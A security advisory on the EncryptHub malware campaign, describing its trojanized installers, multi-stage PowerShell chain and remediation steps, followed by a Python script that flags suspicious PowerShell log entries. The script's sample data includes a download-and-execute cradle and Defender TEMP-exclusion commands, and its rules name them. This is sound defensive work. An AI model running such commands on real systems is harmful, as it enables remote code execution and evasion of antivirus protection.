Severity
High
Analysis Summary
EncryptHub, a highly sophisticated cybercriminal group, has compromised around 600 organizations through a multi-stage malware campaign. The attackers leveraged multiple layers of PowerShell scripts to gather system data, exfiltrate sensitive information, evade detection, and deploy information stealers. Their primary infection method involved trojanized versions of widely used applications, including QQ Talk, WeChat, Microsoft Visual Studio 2022, and Palo Alto Global Protect. These fake applications were generated between November 25th, 2024, and January 1st, 2025, and were signed with code-signing certificates, initially issued to “HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES COMPANY” before being revoked. By February 4th, 2025, the group had switched to a new certificate registered under “Encrypthub LLC,” showcasing their adaptability.
A key aspect of EncryptHub’s operation is its use of third-party distribution channels to maximize reach. The group used a pay-per-install service called “LabInstalls,” operated via a Telegram bot, to automate distribution of its malicious payloads. According to researchers, EncryptHub prioritizes stolen credentials based on cryptocurrency ownership, corporate affiliation, and the presence of VPN software, reflecting a highly targeted approach. Researchers also discovered operational security lapses by the attackers that inadvertently exposed details of their infrastructure, which allowed security analysts to map EncryptHub’s tactics in depth.
The attack sequence begins with a PowerShell command that fetches the first-stage payload from a compromised domain; this payload is designed to steal credentials from messaging applications, crypto wallets, password managers, and VPN clients. The second stage is a PowerShell script, runner.ps1, which processes base64-encoded MSC files to embed malicious URLs. In the third stage, an HTML-based loader modifies Windows Defender settings to exclude the TEMP folder from scanning while downloading additional scripts. The final stage delivers the Rhadamanthys malware, completing the infection chain and ensuring persistent access.

EncryptHub’s activities indicate ongoing evolution, with researchers detecting the development of “EncryptRAT,” a remote access Trojan designed for centralized command-and-control operations. This suggests the group may soon commercialize its malware as a service for other cybercriminals. Organizations are urged to implement robust security measures, including endpoint detection, multi-layered defenses, and continuous monitoring, to defend against this rapidly evolving threat landscape.
Impact
- Exfiltrate Sensitive Information
- Evade Detection
- Gain Access
Indicators of Compromise
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Deploy advanced endpoint detection and response (EDR) solutions.
- Regularly update and patch all software, especially security tools.
- Enforce multi-factor authentication (MFA) for all user accounts.
- Limit administrative privileges and use role-based access control (RBAC).
- Implement network segmentation to contain threats.
- Use email filtering and attachment scanning to detect phishing attempts.
- Continuously monitor logs for unusual authentication attempts and data exfiltration.
- Set up alerts for PowerShell execution and unauthorized system modifications.
- Verify software integrity before installation; avoid downloading from untrusted sources.
- Revoke and replace any compromised digital certificates.
- Conduct regular security awareness training on phishing and social engineering threats.
- Educate employees on identifying trojanized applications and suspicious downloads.
- Maintain regular offline backups of critical data.
- Develop and test an incident response plan for malware infections.
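Two of the behaviours described in the attack chain above, a Windows Defender exclusion added for the TEMP folder and a remote .ps1 fetched and executed by a download cradle, are visible in PowerShell script block logs (Event ID 4104). The following is an added detection example, not code from the advisory or from the threat actor; the log entries are constructed and the rule names are illustrative:

```python
import re

# Constructed sample PowerShell script block texts (as logged by Event ID 4104).
# These are illustrative, not real entries from the campaign. The IP is a
# documentation address (RFC 5737), not an indicator from the advisory.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem -Path C:\\Users\\alice\\Documents | Sort-Object Length",
    "Add-MpPreference -ExclusionPath $env:TEMP; Start-Sleep 2",
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/files/123/abc.ps1')",
    "Set-MpPreference -ExclusionPath 'C:\\Users\\bob\\AppData\\Local\\Temp'",
]

# Each rule is (name, compiled regex). Case-insensitive because PowerShell is.
RULES = [
    # Defender exclusion that covers the user's TEMP directory (stage 3 of the chain).
    ("defender_exclusion_temp",
     re.compile(r"(Add|Set)-MpPreference\b.*-ExclusionPath\b.*(\$env:TEMP|\$env:TMP|\\Temp\b)", re.I)),
    # A .ps1 pulled from a remote HTTP(S) host (stages 1 and 3 fetch additional scripts).
    ("remote_ps1_download",
     re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest|iwr|irm|Invoke-RestMethod)\b.*https?://[^\s'\"]+\.ps1", re.I)),
    # Classic download-and-execute cradle: IEX wrapped around a web fetch.
    ("iex_download_cradle",
     re.compile(r"\b(IEX|Invoke-Expression)\b.*\b(DownloadString|Invoke-WebRequest|Invoke-RestMethod)\b", re.I)),
]


def classify_script_block(text):
    """Return the names of all rules that match one script block, in RULES order."""
    return [name for name, rx in RULES if rx.search(text)]


def scan(blocks):
    """Map block index -> matched rule names, for blocks that hit at least one rule."""
    hits = {}
    for i, block in enumerate(blocks):
        matched = classify_script_block(block)
        if matched:
            hits[i] = matched
    return hits


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"ALERT block {idx}: {', '.join(names)} :: {SAMPLE_SCRIPT_BLOCKS[idx][:60]}")
```

In production the blocks would come from the Microsoft-Windows-PowerShell/Operational log with script block logging enabled; a hit on the exclusion rule for TEMP is worth an alert on its own, since legitimate software rarely needs it.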